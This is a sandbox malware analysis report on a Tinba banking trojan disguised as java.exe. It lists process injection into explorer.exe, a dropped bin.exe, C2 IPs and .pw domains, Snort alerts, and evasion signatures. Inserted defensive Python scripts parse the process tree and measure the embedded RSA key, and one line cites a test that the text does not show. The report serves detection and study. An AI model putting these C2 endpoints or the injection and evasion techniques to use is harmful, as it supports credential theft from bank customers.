
Windows Analysis Report
java.exe

Overview

General Information

Sample name: java.exe
Analysis ID: 1366396
MD5: 91493a9a9e83a7b48d178ae10f97028d
SHA1: 7f774f01e7f3768de1802226fb6ab15242bea878
SHA256: 79dc8da8c5f7b41a0eed67e10e5239355be1c6e089738138dfa3b753fe019355
Tags: exe, tinba

Detection

Tinba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Tinba Banker
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Exploit detected, runtime environment starts unknown processes
Hooks files or directories query functions (used to hide files and directories)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • java.exe (PID: 7284 cmdline: C:\Users\user\Desktop\java.exe MD5: 91493A9A9E83A7B48D178AE10F97028D)
    • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winver.exe (PID: 7344 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • bin.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe" MD5: EA8543BCC2E4689874647E2507DA6B29)
          • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bin.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe" MD5: EA8543BCC2E4689874647E2507DA6B29)
          • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3832 cmdline: ctfmon.exe MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
      • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
      • svchost.exe (PID: 1020 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dllhost.exe (PID: 2944 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RuntimeBroker.exe (PID: 1184 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • backgroundTaskHost.exe (PID: 1188 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
      • RuntimeBroker.exe (PID: 5100 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • qqQDbrYlXafmy.exe (PID: 2852 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 4500 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 1744 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 4520 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 5568 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 1508 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 2836 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 2640 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 5348 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 5668 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
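The tree above is the report's record of the infection chain: the sample (java.exe, run from the Desktop) starts winver.exe, explorer.exe is drawn beneath winver.exe, and explorer.exe in turn launches bin.exe out of %APPDATA%\Roaming\F90F00A9\. The following triage script is an added example, not part of the Joe Sandbox report: it parses a constructed copy of nine of the tree lines above (indentation preserved) into parent/child records and applies three checks drawn from what the report flags. The drop-path regex, the list of processes that legitimately parent explorer.exe, and the Java install-directory pattern are this example's own heuristics; it also assumes, as Joe Sandbox's tree convention, that a process drawn under another was either spawned by it or injected by it.

```python
"""Parse a Joe Sandbox-style process tree and flag the injection/drop chain.

Added example; the checks are this example's heuristics, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: nine lines copied from the report's process tree, indentation kept.
TREE = r"""
  • java.exe (PID: 7284 cmdline: C:\Users\user\Desktop\java.exe MD5: 91493A9A9E83A7B48D178AE10F97028D)
    • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winver.exe (PID: 7344 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • bin.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe" MD5: EA8543BCC2E4689874647E2507DA6B29)
          • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bin.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe" MD5: EA8543BCC2E4689874647E2507DA6B29)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
"""

# One tree line: indentation, image name, PID, command line, MD5.
LINE = re.compile(
    r"^(?P<indent>\s*)• (?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)

# Heuristics (this example's own, not Joe Sandbox logic).
ROAMING_DROP = re.compile(r"\\AppData\\Roaming\\[0-9A-F]{8}\\[^\\]+\.exe$", re.I)  # bin.exe drop location
JAVA_HOME = re.compile(r"\\(java|jre|jdk)[^\\]*\\bin\\java\.exe$", re.I)           # where a real java.exe lives
EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}                 # normal parents of explorer.exe


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str
    md5: str


def image_path(cmdline: str) -> str:
    """First token of the command line, honouring a quoted path."""
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(" ", 1)[0]


def parse_tree(text: str) -> List[Proc]:
    """Turn the indented bullet tree into Proc records; indentation depth gives the parent."""
    procs: List[Proc] = []
    stack: List[Tuple[int, int]] = []  # (indent width, pid) of the open ancestors
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        indent = len(m["indent"])
        while stack and stack[-1][0] >= indent:
            stack.pop()
        ppid = stack[-1][1] if stack else None
        proc = Proc(int(m["pid"]), ppid, m["image"], m["cmd"], m["md5"].upper())
        procs.append(proc)
        stack.append((indent, proc.pid))
    return procs


def triage(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for every process one of the three checks catches."""
    by_pid = {p.pid: p for p in procs}
    findings: List[Tuple[int, str]] = []
    for p in procs:
        path = image_path(p.cmdline)
        if ROAMING_DROP.search(path):
            findings.append((p.pid, "executable under %APPDATA%\\Roaming\\<8 hex chars>\\ (dropped payload)"))
        if p.image.lower() == "java.exe" and not JAVA_HOME.search(path):
            findings.append((p.pid, "java.exe outside a Java install directory (masquerading name)"))
        if p.image.lower() == "explorer.exe" and p.ppid is not None:
            parent = by_pid[p.ppid]
            if parent.image.lower() not in EXPLORER_PARENTS:
                findings.append((p.pid, f"explorer.exe drawn under {parent.image} (PID {parent.pid}): injection target"))
    return findings


if __name__ == "__main__":
    for pid, reason in triage(parse_tree(TREE)):
        print(f"PID {pid}: {reason}")
```

Fed the report's own lines, the script flags java.exe (7284), explorer.exe (2580, parented by winver.exe) and both bin.exe instances (7532, 7776), and leaves conhost.exe, sihost.exe and svchost.exe alone. On a live host the same three checks translate directly to Sysmon Event ID 1 fields (Image, ParentImage).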
Name: Tinba
Description: F-Secure notes that TinyBanker, or Tinba for short, is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe. If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and, if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc. in the legitimate-looking page. Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba
No configs have been found
Source                                        Rule               Description                 Author
Process Memory Space: java.exe PID: 7284      JoeSecurity_Tinba  Yara detected Tinba Banker  Joe Security
Process Memory Space: winver.exe PID: 7344    JoeSecurity_Tinba  Yara detected Tinba Banker  Joe Security
Process Memory Space: explorer.exe PID: 2580  JoeSecurity_Tinba  Yara detected Tinba Banker  Joe Security
Process Memory Space: sihost.exe PID: 3420    JoeSecurity_Tinba  Yara detected Tinba Banker  Joe Security
Process Memory Space: svchost.exe PID: 3456   JoeSecurity_Tinba  Yara detected Tinba Banker  Joe Security

No Sigma rule has matched
Snort IDS alerts (all TCP to destination port 80; classtype of every alert: "A Network Trojan was detected"):

Timestamp                  Source IP     Src port  Destination IP   Dst port  SID
12/22/23-21:31:45.756024   192.168.2.4   49742     216.218.185.162  80        2020418
12/22/23-21:31:50.428588   192.168.2.4   49745     216.218.185.162  80        2830613
12/22/23-21:31:53.740170   192.168.2.4   49748     216.218.185.162  80        2830613
12/22/23-21:31:50.428588   192.168.2.4   49745     216.218.185.162  80        2020418
12/22/23-21:31:50.428588   192.168.2.4   49745     216.218.185.162  80        2024659
12/22/23-21:31:41.115704   192.168.2.4   49739     216.218.185.162  80        2020418
12/22/23-21:31:41.115704   192.168.2.4   49739     216.218.185.162  80        2024659
12/22/23-21:31:53.740170   192.168.2.4   49748     216.218.185.162  80        2024659
12/22/23-21:31:53.740170   192.168.2.4   49748     216.218.185.162  80        2020418
12/22/23-21:31:38.006819   192.168.2.4   49737     216.218.185.162  80        2020418
12/22/23-21:31:52.053475   192.168.2.4   49746     216.218.185.162  80        2024659
12/22/23-21:31:42.585880   192.168.2.4   49740     216.218.185.162  80        2024659
12/22/23-21:31:47.490220   192.168.2.4   49743     216.218.185.162  80        2024659
12/22/23-21:31:44.432614   192.168.2.4   49741     216.218.185.162  80        2020418
12/22/23-21:31:47.490220   192.168.2.4   49743     216.218.185.162  80        2020418
12/22/23-21:31:35.805907   192.168.2.4   49736     45.77.249.79     80        2024659
12/22/23-21:31:35.805907   192.168.2.4   49736     45.77.249.79     80        2020418
12/22/23-21:31:41.115704   192.168.2.4   49739     216.218.185.162  80        2830613
12/22/23-21:31:38.006819   192.168.2.4   49737     216.218.185.162  80        2024659
12/22/23-21:31:52.053475   192.168.2.4   49746     216.218.185.162  80        2020418
12/22/23-21:31:39.602700   192.168.2.4   49738     216.218.185.162  80        2024659
12/22/23-21:31:47.490220   192.168.2.4   49743     216.218.185.162  80        2830613
12/22/23-21:31:39.602700   192.168.2.4   49738     216.218.185.162  80        2020418
12/22/23-21:31:48.965379   192.168.2.4   49744     216.218.185.162  80        2024659
12/22/23-21:31:44.432614   192.168.2.4   49741     216.218.185.162  80        2024659
12/22/23-21:31:19.712756   192.168.2.4   49735     216.218.185.162  80        2020418
12/22/23-21:31:42.585880   192.168.2.4   49740     216.218.185.162  80        2020418
12/22/23-21:31:19.712756   192.168.2.4   49735     216.218.185.162  80        2024659
12/22/23-21:31:48.965379   192.168.2.4   49744     216.218.185.162  80        2020418
12/22/23-21:31:38.006819   192.168.2.4   49737     216.218.185.162  80        2830613
12/22/23-21:31:35.805907   192.168.2.4   49736     45.77.249.79     80        2830613
12/22/23-21:31:45.756024   192.168.2.4   49742     216.218.185.162  80        2024659
12/22/23-21:31:44.432614   192.168.2.4   49741     216.218.185.162  80        2830613


AV Detection

Source: java.exe | Avira: detected
Source: http://evbsdqvgmpph.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://fccfxejgtpqb.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://xtbbpqfrsubt.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://wwgfyvvdtmeq.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://mfueeimvyrsp.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://spaines.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://cmnsgscccrej.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://fkmmvfeonnyh.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://gfnlmtcolrrb.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Avira: detection malicious, Label: HEUR/AGEN.1322420
Source: java.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Joe Sandbox ML: detected
Source: java.exe | Joe Sandbox ML: detected

Compliance

Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_02F02DCF CryptAcquireContextA, CryptImportPublicKeyInfo, CryptCreateHash, CryptHashData, CryptVerifySignatureA, CryptDestroyHash, CryptDestroyKey, CryptReleaseContext
Source: java.exe | Binary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAldMoUs9Ytg4Z6u+LBejj XsQpi94U2CbOGCF5DieMHxzcr5nhleioQixxAah9IEXJgzZ8Ag69xjMADnuKMumV xOFw6SbeOhRGrT/al5Rv/X56bsKPBBn5UAR5xhzUielXM77Z8R0oKVOKfXYDXdMq hx6FPFOOnV4/H7u3zf0sUbHXjbJEamXSjWRd0O
Source: java.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49729 version: TLS 1.2
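The public-key string in the java.exe row above is cut off in the report, but the DER headers that precede the modulus are intact, and those headers alone fix the key size. The following is an added example, not code from the report or from the malware: it base64-decodes only the characters the report prints, walks SubjectPublicKeyInfo -> AlgorithmIdentifier -> BIT STRING -> RSAPublicKey -> modulus INTEGER using nothing but the TLV lengths, and reports the algorithm OID and modulus bit length. Nothing past the visible characters is assumed. Read together with the CryptImportPublicKeyInfo / CryptVerifySignatureA chain in the winver.exe row, a verify-only key of this size is consistent with the sample authenticating data it receives; the report itself does not say what is verified, so that reading is an inference.

```python
"""Determine the size of an RSA public key from a truncated PEM body.

Added example; uses only the key characters printed in the Joe Sandbox report.
"""
import base64
from typing import Dict, Tuple

# The key exactly as the report prints it (truncated there; nothing beyond this is assumed).
REPORT_KEY_PREFIX = (
    "MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAldMoUs9Ytg4Z6u+LBejj"
    "XsQpi94U2CbOGCF5DieMHxzcr5nhleioQixxAah9IEXJgzZ8Ag69xjMADnuKMumV"
    "xOFw6SbeOhRGrT/al5Rv/X56bsKPBBn5UAR5xhzUielXM77Z8R0oKVOKfXYDXdMq"
    "hx6FPFOOnV4/H7u3zf0sUbHXjbJEamXSjWRd0O"
)
RSA_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1, rsaEncryption


def decode_prefix(pem_body: str) -> bytes:
    """Base64-decode as much of a truncated PEM body as forms whole 4-character groups."""
    b64 = "".join(pem_body.split())
    return base64.b64decode(b64[: len(b64) // 4 * 4])


def read_tlv(buf: bytes, pos: int) -> Tuple[int, int, int]:
    """Return (tag, content_length, content_offset) of the DER element at `pos`."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, length, pos


def _expect(tag: int, want: int, what: str) -> None:
    if tag != want:
        raise ValueError(f"expected {what} (tag 0x{want:02x}), got 0x{tag:02x}")


def rsa_spki_info(der: bytes) -> Dict[str, object]:
    """Walk SubjectPublicKeyInfo down to the modulus INTEGER using only the headers,
    so the modulus bytes themselves need not be complete."""
    tag, _, pos = read_tlv(der, 0)                      # SubjectPublicKeyInfo SEQUENCE
    _expect(tag, 0x30, "SubjectPublicKeyInfo")
    tag, alg_len, alg_pos = read_tlv(der, pos)          # AlgorithmIdentifier SEQUENCE
    _expect(tag, 0x30, "AlgorithmIdentifier")
    tag, oid_len, oid_pos = read_tlv(der, alg_pos)      # algorithm OID
    _expect(tag, 0x06, "OBJECT IDENTIFIER")
    algorithm = der[oid_pos:oid_pos + oid_len]
    tag, _, pos = read_tlv(der, alg_pos + alg_len)      # subjectPublicKey BIT STRING
    _expect(tag, 0x03, "BIT STRING")
    pos += 1                                            # skip the unused-bits byte
    tag, _, pos = read_tlv(der, pos)                    # RSAPublicKey SEQUENCE
    _expect(tag, 0x30, "RSAPublicKey")
    tag, mod_len, mod_pos = read_tlv(der, pos)          # modulus INTEGER
    _expect(tag, 0x02, "modulus INTEGER")
    first, second = der[mod_pos], der[mod_pos + 1]
    leading_zero = first == 0                           # DER pads a positive INTEGER whose top bit is set
    msb = second if leading_zero else first
    bits = (mod_len - (1 if leading_zero else 0) - 1) * 8 + msb.bit_length()
    return {"is_rsa": algorithm == RSA_OID, "modulus_bytes": mod_len, "modulus_bits": bits}


if __name__ == "__main__":
    print(rsa_spki_info(decode_prefix(REPORT_KEY_PREFIX)))
```

For the key above the walk yields a 513-byte modulus (one zero pad byte plus 512 bytes of modulus), i.e. RSA-4096; the same function works on any SPKI prefix long enough to reach the modulus header, which the test exercises with a constructed 2048-bit header.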

Software Vulnerabilities

Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\System32\conhost.exe
(This entry backs the "Exploit detected, runtime environment starts unknown processes" signature. The process named java.exe here is the Tinba sample itself, run from the Desktop and matched by the Tinba Yara rule, not a Java runtime, so the signature is a consequence of the sample's file name rather than evidence of a Java exploit.)

Networking

Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49735 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49735 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49736 -> 45.77.249.79:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49736 -> 45.77.249.79:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49736 -> 45.77.249.79:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49737 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49737 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49737 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49738 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49738 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49739 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49739 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49739 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49740 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49740 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49741 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49741 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49741 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49742 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49742 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49743 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49743 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49743 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49744 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49744 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49745 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49745 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49745 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49746 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49746 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49748 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49748 -> 216.218.185.162:80
